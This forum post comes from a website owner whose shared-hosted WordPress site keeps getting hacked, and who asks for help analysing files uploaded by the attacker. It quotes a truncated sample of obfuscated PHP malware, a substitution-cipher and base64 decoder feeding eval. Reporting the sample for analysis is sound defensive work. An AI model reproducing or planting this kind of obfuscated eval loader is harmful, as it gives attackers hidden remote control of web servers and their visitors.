I manage a wordpress website on a shared hosting space which also holds other PHP applications.
This website keeps getting hacked - codes are injected into files and strange files are uploaded.
The website has been blacklisted once by Google for serving malware and spamming.
I have gotten hold of some of the strange files uploaded to the website. I need help determining what they
do, maybe that will give a clue to how the attack is carried out.
Here is a preview from one of the files:
Code: Select all
<?php
$evgiriesgt = 4906; function wahpvdpnen($undacn, $fqocaar){$qnhdcm = ''; for($i=0; $i < strlen($undacn); $i++){$qnhdcm .= isset($fqocaar[$undacn[$i]]) ? $fqocaar[$undacn[$i]] : $undacn[$i];}
$swztdx="base" . "64_decode";return $swztdx($qnhdcm);}
$wwuoxneyhf = 'k852rBYaMKkzIcBQVNYQKcUhMQVpljXBbje17eFqk852rBYaMKkzIcUhMfY5VLIhVLoL'.
/*Missing lines*/
'xN5NlxWgVNBaqPusvkzWlxEWMD4zZQEgVNBa7eFq3kFqvk15T85Fqxgs';
$yoazv = Array('1'=>'p', '0'=>'j', '3'=>'f', '2'=>'u', '5'=>'l', '4'=>'N', '7'=>'O', '6'=>'Y', '9'=>'U', '8'=>'G', 'A'=>'6', 'C'=>'t', 'B'=>'V', 'E'=>'A', 'D'=>'W', 'G'=>'4', 'F'=>'0', 'I'=>'J', 'H'=>'3', 'K'=>'X', 'J'=>'q', 'M'=>'Z', 'L'=>'n', 'O'=>'H', 'N'=>'m', 'Q'=>'y', 'P'=>'S', 'S'=>'F', 'R'=>'h', 'U'=>'x', 'T'=>'e', 'W'=>'g', 'V'=>'c', 'Y'=>'9', 'X'=>'5', 'Z'=>'b', 'a'=>'z', 'c'=>'2', 'b'=>'T', 'e'=>'w', 'd'=>'d', 'g'=>'k', 'f'=>'1', 'i'=>'L', 'h'=>'v', 'k'=>'Q', 'j'=>'E', 'm'=>'P', 'l'=>'I', 'o'=>'M', 'n'=>'r', 'q'=>'K', 'p'=>'s', 's'=>'7', 'r'=>'a', 'u'=>'B', 't'=>'8', 'w'=>'i', 'v'=>'D', 'y'=>'R', 'x'=>'C', 'z'=>'o');
eval/*auswexcu*/(wahpvdpnen($wwuoxneyhf, $yoazv));?>
http://pastebin.com/6frRpVhq
Thanks.